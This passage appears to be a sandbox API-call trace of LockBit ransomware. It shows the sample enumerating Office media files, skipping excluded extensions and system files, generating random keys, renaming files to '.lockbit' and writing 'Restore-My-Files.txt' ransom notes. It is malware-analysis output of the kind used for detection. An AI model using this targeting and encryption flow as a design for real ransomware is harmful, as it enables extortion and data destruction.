(lpString1=".ndf", lpString2=".WMF") returned -1 [0196.320] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.320] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.320] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.320] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.320] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.320] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.320] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.320] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.320] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0090070.WMF.lockbit") returned 70 [0196.320] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0090070.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0090070.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0196.325] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.325] malloc (_Size=0x40068) returned 0x3d70450 [0196.325] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=34944) returned 1 [0196.325] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.325] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.325] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0196.326] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.326] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.326] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0196.326] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0196.339] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0090070.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0090070.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.339] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.339] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0196.341] free (_Block=0x1fa2ed8) [0196.341] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0090070.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.341] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.341] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.341] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59c88400, ftCreationTime.dwHighDateTime=0x1bd208e, ftLastAccessTime.dwLowDateTime=0xbd3e24a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x59c88400, ftLastWriteTime.dwHighDateTime=0x1bd208e, nFileSizeHigh=0x0, nFileSizeLow=0x830a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0090386.WMF", cAlternateFileName="")) returned 1 [0196.341] lstrcmpiW (lpString1=".", lpString2="J0090386.WMF") returned -1 [0196.341] lstrcmpiW (lpString1="..", lpString2="J0090386.WMF") returned -1 [0196.341] PathFindExtensionW (pszPath="J0090386.WMF") returned=".WMF" [0196.341] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.341] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.341] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.342] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.342] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.342] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.342] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.342] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.342] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.342] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.342] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.342] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.342] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.342] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.342] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.342] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.342] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.342] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.342] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.342] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.342] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.342] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.342] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.342] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.343] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.343] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.343] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.343] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.343] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.343] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.343] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.343] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.343] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.343] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.343] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.343] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.343] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.343] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.343] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.343] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.343] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.343] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.343] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.343] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.343] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.344] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.344] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.344] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0090386.WMF") returned 1 [0196.344] lstrcmpiW (lpString1="ntldr", lpString2="J0090386.WMF") returned 1 [0196.344] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0090386.WMF") returned 1 [0196.344] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0090386.WMF") returned -1 [0196.344] lstrcmpiW (lpString1="autorun.inf", lpString2="J0090386.WMF") returned -1 [0196.344] lstrcmpiW (lpString1="thumbs.db", lpString2="J0090386.WMF") returned 1 [0196.344] lstrcmpiW (lpString1="iconcache.db", lpString2="J0090386.WMF") returned -1 [0196.344] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.344] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0090386.WMF") returned=".WMF" [0196.344] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.344] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.344] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.344] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.344] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.344] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.344] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.344] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.344] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.344] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.345] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.345] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.345] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.345] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.345] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.345] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.345] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.345] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.345] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.345] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.345] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.345] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.345] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.345] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.345] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.345] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.345] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.345] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.345] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0090386.WMF.lockbit") returned 70 [0196.345] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0090386.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0090386.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0196.347] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.347] malloc (_Size=0x40068) returned 0x3f70048 [0196.347] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=33546) returned 1 [0196.347] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.348] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.348] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0196.348] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.349] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.349] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0196.349] ReadFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0196.353] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0090386.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0090386.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.353] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.353] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0196.358] free (_Block=0x1fa2ed8) [0196.358] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0090386.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.358] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.358] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.358] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e332700, ftCreationTime.dwHighDateTime=0x1bd3d86, ftLastAccessTime.dwLowDateTime=0xbd4548c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x6e332700, ftLastWriteTime.dwHighDateTime=0x1bd3d86, nFileSizeHigh=0x0, nFileSizeLow=0x870a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0149407.WMF", cAlternateFileName="")) returned 1 [0196.358] lstrcmpiW (lpString1=".", lpString2="J0149407.WMF") returned -1 [0196.358] lstrcmpiW (lpString1="..", lpString2="J0149407.WMF") returned -1 [0196.358] PathFindExtensionW (pszPath="J0149407.WMF") returned=".WMF" [0196.358] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.358] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.358] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.358] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.358] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.358] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.358] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.358] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.358] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.359] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.359] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.359] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.359] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.359] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.359] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.359] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.359] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.359] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.359] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.359] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.359] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.359] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.359] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.359] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.359] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.359] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.359] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.359] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.359] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.359] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.360] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.360] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.360] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.360] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.360] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.360] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.360] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.360] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.360] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.360] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.360] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.360] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.360] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.360] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.360] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.360] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.360] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.360] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0149407.WMF") returned 1 [0196.360] lstrcmpiW (lpString1="ntldr", lpString2="J0149407.WMF") returned 1 [0196.360] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0149407.WMF") returned 1 [0196.361] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0149407.WMF") returned -1 [0196.361] lstrcmpiW (lpString1="autorun.inf", lpString2="J0149407.WMF") returned -1 [0196.361] lstrcmpiW (lpString1="thumbs.db", lpString2="J0149407.WMF") returned 1 [0196.361] lstrcmpiW (lpString1="iconcache.db", lpString2="J0149407.WMF") returned -1 [0196.361] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.361] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0149407.WMF") returned=".WMF" [0196.361] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.361] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.361] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.361] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.361] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.361] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.361] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.361] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.361] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.361] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.361] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.361] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.361] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.361] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.362] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.362] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.362] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.362] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.362] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.362] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.362] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.362] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.362] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.362] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.362] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.362] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.362] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.362] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.362] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0149407.WMF.lockbit") returned 70 [0196.362] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0149407.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0149407.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0196.373] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.373] malloc (_Size=0x40068) returned 0x3df0008 [0196.373] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=34570) returned 1 [0196.373] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.374] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.374] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.374] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.374] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.379] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0149407.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0149407.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.379] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.379] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0196.381] free (_Block=0x1fa2ed8) [0196.381] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0149407.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.381] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.381] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.381] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fd5900, ftCreationTime.dwHighDateTime=0x1bd4249, ftLastAccessTime.dwLowDateTime=0xbd4548c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x4fd5900, ftLastWriteTime.dwHighDateTime=0x1bd4249, nFileSizeHigh=0x0, nFileSizeLow=0x5eda, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0149481.WMF", cAlternateFileName="")) returned 1 [0196.381] lstrcmpiW (lpString1=".", lpString2="J0149481.WMF") returned -1 [0196.381] lstrcmpiW (lpString1="..", lpString2="J0149481.WMF") returned -1 [0196.381] PathFindExtensionW (pszPath="J0149481.WMF") returned=".WMF" [0196.381] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.381] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.381] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.381] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.381] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.381] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.381] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.381] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.381] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.381] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.381] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.381] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.382] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.382] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.382] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.382] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.382] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.382] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.382] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.382] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.382] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.382] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.382] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.382] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.382] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.382] 